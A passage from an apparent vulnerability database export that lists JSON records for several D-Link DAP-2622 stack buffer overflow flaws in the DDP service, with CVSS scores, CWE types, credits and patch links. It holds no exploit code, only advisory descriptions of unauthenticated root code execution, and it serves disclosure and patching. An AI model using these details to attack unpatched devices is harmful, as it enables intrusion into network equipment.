"id": "CVE-2023-37318",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29685",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1272"
},
{
"db": "CNVD",
"id": "CNVD-2025-29685"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028892"
},
{
"db": "NVD",
"id": "CVE-2023-37318"
},
{
"db": "NVD",
"id": "CVE-2023-37318"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-2622 DDP Set IPv6 Address Secondary DNS Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20096. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-37318"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028892"
},
{
"db": "ZDI",
"id": "ZDI-23-1272"
},
{
"db": "CNVD",
"id": "CNVD-2025-29685"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-37318",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-23-1272",
"trust": 2.5
},
{
"db": "DLINK",
"id": "SAP10349",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028892",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-20096",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29685",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1272"
},
{
"db": "CNVD",
"id": "CNVD-2025-29685"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028892"
},
{
"db": "NVD",
"id": "CVE-2023-37318"
}
]
},
"id": "VAR-202308-3111",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29685"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29685"
}
]
},
"last_update_date": "2025-12-19T22:28:23.003000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10349"
},
{
"title": "Patch for D-Link DAP-2622 Stack Buffer Overflow Remote Code Execution Vulnerability (CNVD-2025-29685)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/776471"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1272"
},
{
"db": "CNVD",
"id": "CNVD-2025-29685"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028892"
},
{
"db": "NVD",
"id": "CVE-2023-37318"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10349"
},
{
"trust": 1.8,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1272/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37318"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-37318"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1272"
},
{
"db": "CNVD",
"id": "CNVD-2025-29685"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028892"
},
{
"db": "NVD",
"id": "CVE-2023-37318"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1272"
},
{
"db": "CNVD",
"id": "CNVD-2025-29685"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028892"
},
{
"db": "NVD",
"id": "CVE-2023-37318"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1272"
},
{
"date": "2025-12-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29685"
},
{
"date": "2025-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028892"
},
{
"date": "2024-05-03T02:15:41.917000",
"db": "NVD",
"id": "CVE-2023-37318"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1272"
},
{
"date": "2025-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29685"
},
{
"date": "2025-05-14T02:36:00",
"db": "JVNDB",
"id": "JVNDB-2023-028892"
},
{
"date": "2025-05-13T14:01:09",
"db": "NVD",
"id": "CVE-2023-37318"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-2622\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028892"
}
],
"trust": 0.8
}
}
VAR-202308-3128
Vulnerability from variot - Updated: 2025-12-19 22:28D-Link DAP-2622 DDP Set Device Info Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20088. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-3128",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-2622",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10b03r022"
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-2622 firmware 1.10b03r022"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1265"
},
{
"db": "CNVD",
"id": "CNVD-2025-29682"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028873"
},
{
"db": "NVD",
"id": "CVE-2023-37311"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1265"
}
],
"trust": 0.7
},
"cve": "CVE-2023-37311",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2025-29682",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37311",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37311",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37311",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-37311",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-37311",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-37311",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-37311",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29682",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1265"
},
{
"db": "CNVD",
"id": "CNVD-2025-29682"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028873"
},
{
"db": "NVD",
"id": "CVE-2023-37311"
},
{
"db": "NVD",
"id": "CVE-2023-37311"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-2622 DDP Set Device Info Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20088. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-37311"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028873"
},
{
"db": "ZDI",
"id": "ZDI-23-1265"
},
{
"db": "CNVD",
"id": "CNVD-2025-29682"
},
{
"db": "VULMON",
"id": "CVE-2023-37311"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-37311",
"trust": 4.0
},
{
"db": "ZDI",
"id": "ZDI-23-1265",
"trust": 2.6
},
{
"db": "DLINK",
"id": "SAP10349",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028873",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-20088",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29682",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-37311",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1265"
},
{
"db": "CNVD",
"id": "CNVD-2025-29682"
},
{
"db": "VULMON",
"id": "CVE-2023-37311"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028873"
},
{
"db": "NVD",
"id": "CVE-2023-37311"
}
]
},
"id": "VAR-202308-3128",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29682"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29682"
}
]
},
"last_update_date": "2025-12-19T22:28:22.968000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10349"
},
{
"title": "Patch for D-Link DAP-2622 Stack Buffer Overflow Remote Code Execution Vulnerability (CNVD-2025-29682)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/776456"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1265"
},
{
"db": "CNVD",
"id": "CNVD-2025-29682"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028873"
},
{
"db": "NVD",
"id": "CVE-2023-37311"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10349"
},
{
"trust": 1.9,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1265/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37311"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-37311"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1265"
},
{
"db": "CNVD",
"id": "CNVD-2025-29682"
},
{
"db": "VULMON",
"id": "CVE-2023-37311"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028873"
},
{
"db": "NVD",
"id": "CVE-2023-37311"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1265"
},
{
"db": "CNVD",
"id": "CNVD-2025-29682"
},
{
"db": "VULMON",
"id": "CVE-2023-37311"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028873"
},
{
"db": "NVD",
"id": "CVE-2023-37311"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1265"
},
{
"date": "2025-12-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29682"
},
{
"date": "2025-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028873"
},
{
"date": "2024-05-03T02:15:40.737000",
"db": "NVD",
"id": "CVE-2023-37311"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1265"
},
{
"date": "2025-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29682"
},
{
"date": "2025-05-14T02:03:00",
"db": "JVNDB",
"id": "JVNDB-2023-028873"
},
{
"date": "2025-05-13T13:55:43.110000",
"db": "NVD",
"id": "CVE-2023-37311"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-2622\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028873"
}
],
"trust": 0.8
}
}
VAR-202308-3425
Vulnerability from variot - Updated: 2025-12-19 22:28D-Link DAP-2622 DDP Set AG Profile Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20080. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-3425",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-2622",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10b03r022"
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-2622 firmware 1.10b03r022"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1257"
},
{
"db": "CNVD",
"id": "CNVD-2025-29677"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028895"
},
{
"db": "NVD",
"id": "CVE-2023-35752"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1257"
}
],
"trust": 0.7
},
"cve": "CVE-2023-35752",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29677",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35752",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35752",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35752",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-35752",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-35752",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-35752",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-35752",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29677",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1257"
},
{
"db": "CNVD",
"id": "CNVD-2025-29677"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028895"
},
{
"db": "NVD",
"id": "CVE-2023-35752"
},
{
"db": "NVD",
"id": "CVE-2023-35752"
}
]
},
"description": {
"@context": {
